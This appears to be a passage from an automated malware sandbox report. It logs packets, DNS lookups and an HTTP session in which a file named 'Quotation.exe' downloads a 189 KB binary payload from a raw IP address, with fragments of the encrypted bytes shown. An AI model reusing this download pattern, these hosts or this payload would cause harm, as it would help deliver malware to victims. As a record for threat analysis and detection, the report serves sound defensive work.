                                                            Nov 12, 2024 07:35:47.651524067 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.652323961 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.652337074 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.652348995 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.652370930 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.652379990 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.652391911 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.652401924 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.652429104 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.653176069 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653218985 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653223991 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.653233051 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653256893 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653256893 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.653268099 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.653275013 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.653311968 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789269924 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789290905 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789302111 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789313078 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789325953 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789328098 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789338112 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789356947 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789402962 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789582968 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789596081 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789607048 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789623976 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.789625883 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789655924 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.789688110 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790100098 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790112019 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790122032 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790150881 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790174007 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790184021 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790186882 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790199041 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790210009 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.790221930 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790227890 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.790257931 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.791019917 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.791035891 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.791047096 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.791074991 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.791089058 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908085108 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908113003 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908124924 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908145905 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908164978 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908165932 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908179998 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908217907 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908230066 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908241034 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908241034 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908258915 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908293962 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908302069 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908864021 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908883095 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.908907890 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.908920050 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927191973 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927207947 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927222967 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927248001 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927264929 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927333117 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927350044 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927361965 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927372932 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927372932 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927386999 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927401066 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927428961 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927865028 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927877903 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927889109 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.927906990 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.927937984 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.928106070 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.928142071 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.928157091 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.928186893 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027014971 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027031898 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027050018 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027062893 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027075052 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027097940 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027153015 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027321100 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027333975 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027344942 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027367115 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027395964 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027602911 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027615070 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027625084 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.027653933 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.027667999 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046468019 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046493053 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046577930 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046637058 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046648026 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046648979 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046648979 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046648979 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046689987 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046704054 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046804905 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046850920 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046861887 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046874046 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.046874046 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046889067 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.046911955 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047226906 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047271013 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047297001 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047334909 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047359943 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047405005 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047418118 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047430038 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047440052 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.047463894 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.047491074 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146080971 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146141052 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146152973 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146163940 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146229029 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146241903 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146253109 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146265030 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146354914 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146354914 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146599054 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146642923 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.146667957 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.146711111 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.165724039 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165765047 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165873051 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165908098 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165936947 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165951014 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.165952921 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165968895 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165983915 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.165992022 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.165998936 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166011095 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166017056 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166040897 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166070938 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166476965 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166490078 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166501045 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166531086 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166549921 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.166706085 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166774035 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166785955 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.166830063 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265352964 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265381098 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265402079 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265418053 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265430927 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265446901 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265465975 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265476942 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265501022 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265527964 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265538931 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265542984 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265568972 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.265600920 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265600920 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.265614986 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299654007 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299668074 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299679041 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299691916 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299706936 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299725056 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299725056 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299738884 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299751997 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299768925 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299781084 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299782038 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299799919 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299801111 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299813986 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299818039 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299825907 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299835920 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299838066 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299848080 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299866915 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299866915 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.299891949 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.299922943 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.384287119 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384305954 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384314060 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384340048 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384351969 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384362936 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384373903 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384397030 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.384454966 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.384665012 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384675980 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.384711027 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.406569004 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406594038 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406606913 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406660080 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406671047 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406681061 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406682968 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.406692982 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406706095 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406739950 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.406755924 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.406996012 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407044888 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407057047 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407084942 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.407110929 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407118082 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.407124996 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407136917 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407147884 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407160044 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.407171011 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.407208920 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.407964945 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.408020973 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.682235003 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.682502985 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:59.130244970 CET4983680192.168.2.594.141.120.137

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 12, 2024 07:36:28.285089016 CET5623353192.168.2.51.1.1.1
                                                            Nov 12, 2024 07:36:28.307101965 CET53562331.1.1.1192.168.2.5
                                                            Nov 12, 2024 07:36:49.206396103 CET5437653192.168.2.51.1.1.1
                                                            Nov 12, 2024 07:36:49.235395908 CET53543761.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 12, 2024 07:36:28.285089016 CET192.168.2.51.1.1.10xba0cStandard query (0)www.rbis.siteA (IP address)IN (0x0001)false
                                                            Nov 12, 2024 07:36:49.206396103 CET192.168.2.51.1.1.10xecc3Standard query (0)www.alkak.camA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 12, 2024 07:36:28.307101965 CET1.1.1.1192.168.2.50xba0cName error (3)www.rbis.sitenonenoneA (IP address)IN (0x0001)false
                                                            Nov 12, 2024 07:36:49.235395908 CET1.1.1.1192.168.2.50xecc3Name error (3)www.alkak.camnonenoneA (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • 94.141.120.137

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54983694.141.120.137803288C:\Users\user\Desktop\Quotation.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 12, 2024 07:35:46.498218060 CET177OUTGET /qVMezflLJCc194.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: 94.141.120.137
                                                            Cache-Control: no-cache
                                                            Nov 12, 2024 07:35:47.375026941 CET1236INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Tue, 12 Nov 2024 01:47:07 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "7d8f7c7a434db1:0"
                                                            Server: Microsoft-IIS/8.5
                                                            Date: Tue, 12 Nov 2024 06:35:47 GMT
                                                            Content-Length: 189504
                                                            Data Raw: f9 10 bf 3a 48 6c e3 c8 5c 5d e6 35 f9 c4 a7 06 30 78 f2 41 c4 a8 a9 b7 68 3c 46 ed 2e 70 a9 a1 08 0a 67 26 bc 1f 34 e5 73 d0 4e fb f3 5a 14 8f 9d 9f c1 38 58 15 4c 7d dd f5 52 8a 30 55 92 36 df ff af 07 5b ad 43 6c a5 94 d7 72 58 92 d4 b6 19 95 fd 5b c7 2d 38 56 79 d6 7e 4a b8 8d 45 e6 90 37 a7 cf 20 fb 33 48 63 23 07 52 76 6e 8e b2 82 f4 3a 23 70 93 9c ef 60 ba 1a 4e 83 17 ca 0f bb 66 b7 21 22 fd f6 72 91 4d 83 8c 09 58 dd 1c ba c4 e0 49 74 d6 2c 75 5c 4c e5 0b 81 a2 31 95 5b 3f e9 00 7c 00 9c 27 b8 69 e4 d1 a8 09 6f 2c f9 a2 6b 1f c4 bb 70 06 29 79 3e 08 03 11 5d 6e 74 b0 63 2e 65 44 c3 c1 8e 46 ed 33 86 e0 74 3b 0f fa 77 96 03 81 aa 6f 06 b9 97 71 9b 1c 1a d8 38 d6 3d 7d 03 58 7f 22 b0 2c 10 d8 8c d6 11 85 bf 16 c4 db 12 b2 15 28 a6 14 f5 0e 8c 30 c0 d7 55 b4 50 53 f1 3f 9d 78 73 3e 7c bb 24 e8 a3 ad f9 5c de 0c bf 7e 25 16 54 53 e5 2a a2 fa 2a 12 f0 e0 77 bb 72 de f5 59 03 43 42 c5 75 d4 de 28 4f 3e e8 f8 6b da 84 78 52 e2 e2 97 a1 1b 3b 0c 56 04 76 c1 eb f0 e6 b9 db a9 2f 94 73 49 23 61 45 a2 [TRUNCATED]
                                                            Data Ascii: :Hl\]50xAh<F.pg&4sNZ8XL}R0U6[ClrX[-8Vy~JE7 3Hc#Rvn:#p`Nf!"rMXIt,u\L1[?|'io,kp)y>]ntc.eDF3t;woq8=}X",(0UPS?xs>|$\~%TS**wrYCBu(O>kxR;Vv/sI#aE<cYiea;a5gfQ`dn*RckB;ODe6Wt7t_3En~wqBcr&*-iBd-lXZ (q)5%e,jX?fSC&{_bb|kH3xm9+##!6Uz{G>3)t!eu-`!KzIgG$};qyZ_zwk";9c7z0r!P$f uV(8AtA#<#pBT3!&97se5ZVuQ}XlHl8.`%iW^3Ak$M-8nOCDSM)*>k|Q|,YPF<@g@B05&A'{=Y&?#3rb{<~zIuHcheWL})L+E>_W/
                                                            Nov 12, 2024 07:35:47.375047922 CET212INData Raw: 70 74 32 b8 8c 7b 7a 16 d8 ba b2 21 e7 47 a0 88 36 e3 81 20 4b b4 f0 47 c2 04 ab 02 22 f5 d7 6f ad 4a 32 85 bd 1f 49 cc 25 95 c6 11 f1 bd fc 7b 16 32 8a ea 3e 8b 66 e5 e5 47 43 08 39 49 d4 59 68 91 2d 08 df bd 17 cd ab 73 7f 8e 4c 66 70 ec e9 84
                                                            Data Ascii: pt2{z!G6 KG"oJ2I%{2>fGC9IYh-sLfpc9Q'c"kVz77aw}w&myhF4or<CbO*4df=|[u-4FF4FAbuWgrNuQa`Z
                                                            Nov 12, 2024 07:35:47.375060081 CET1236INData Raw: bc 1b a3 50 99 56 89 d8 38 56 d0 94 99 09 fc b2 6f 08 9d 08 ca b4 14 5d 4b 0b 49 a0 d9 6c 33 ba d0 1c 08 bc 36 cc 71 b8 d6 19 ad 3f a3 f4 31 ad e1 52 36 5f 75 c8 36 69 64 1d 14 48 c2 8f 05 f6 34 7e 36 65 66 1a 7a 88 0a 17 38 cc 67 1e b7 96 46 1a
                                                            Data Ascii: PV8Vo]KIl36q?1R6_u6idH4~6efz8gFw0Ow!z|~c:#NMLQGua'i_d/$*?r-6I(I;:ES#4&"B2^bB?G?me 3M|
                                                            Nov 12, 2024 07:35:47.375073910 CET1236INData Raw: ba b2 21 e7 47 a0 88 36 e3 81 20 4b b4 f0 47 c2 04 ab 02 22 f5 d7 6f ad 4a 32 85 bd 1f 49 cc 25 95 c6 11 f1 bd fc 7b 16 32 8a ea 3e 8b 66 e5 e5 47 43 08 39 49 d4 59 68 91 2d 08 df bd 17 cd ab 73 7f 8e 4c 66 70 ec e9 84 63 39 01 00 12 c9 51 f1 27
                                                            Data Ascii: !G6 KG"oJ2I%{2>fGC9IYh-sLfpc9Q'c"kVz77aw}w&myhF4or<CbO*4df=|[u-4FF4FAbuWgrNuQa`ZPV8Vo]KIl36q
                                                            Nov 12, 2024 07:35:47.375086069 CET424INData Raw: 25 f1 09 69 96 57 ee 8c 5e d7 a8 33 a7 41 e0 1a 1a be 08 fc 6b 8f af 24 4d 2d 08 38 6e 4f 43 44 53 94 00 db 82 fe 4d 29 a3 08 89 c2 2a b6 91 3e da b0 fd a0 6b a1 ef 13 7f e7 7c a0 f6 51 7c a5 2c 59 1b bd cd 84 50 0f 46 95 3c fb 40 d7 d9 b7 84 ae
                                                            Data Ascii: %iW^3Ak$M-8nOCDSM)*>k|Q|,YPF<@g@B05&A'{=Y&?#3rb{<~zIuHcheWL})L+E>_W/pt2{z!G6 KG"oJ2I%{
                                                            Nov 12, 2024 07:35:47.375097036 CET1236INData Raw: 9d 08 ca b4 14 5d 4b 0b 49 a0 d9 6c 33 ba d0 1c 08 bc 36 cc 71 b8 d6 19 ad 3f a3 f4 31 ad e1 52 36 5f 75 c8 36 69 64 1d 14 48 c2 8f 05 f6 34 7e 36 65 66 1a 7a 88 0a 17 38 99 ec f2 3c d3 56 9f b7 c6 27 e4 8a fa 47 27 5e 4a a8 e0 84 19 8d be 20 fb
                                                            Data Ascii: ]KIl36q?1R6_u6idH4~6efz8<V'G'^J hvK;>+3>BjW5@bxa6kx !tuI[&7]B![,#(c6z(V+,*M^;:Q25HGce{F4 mH[AmS
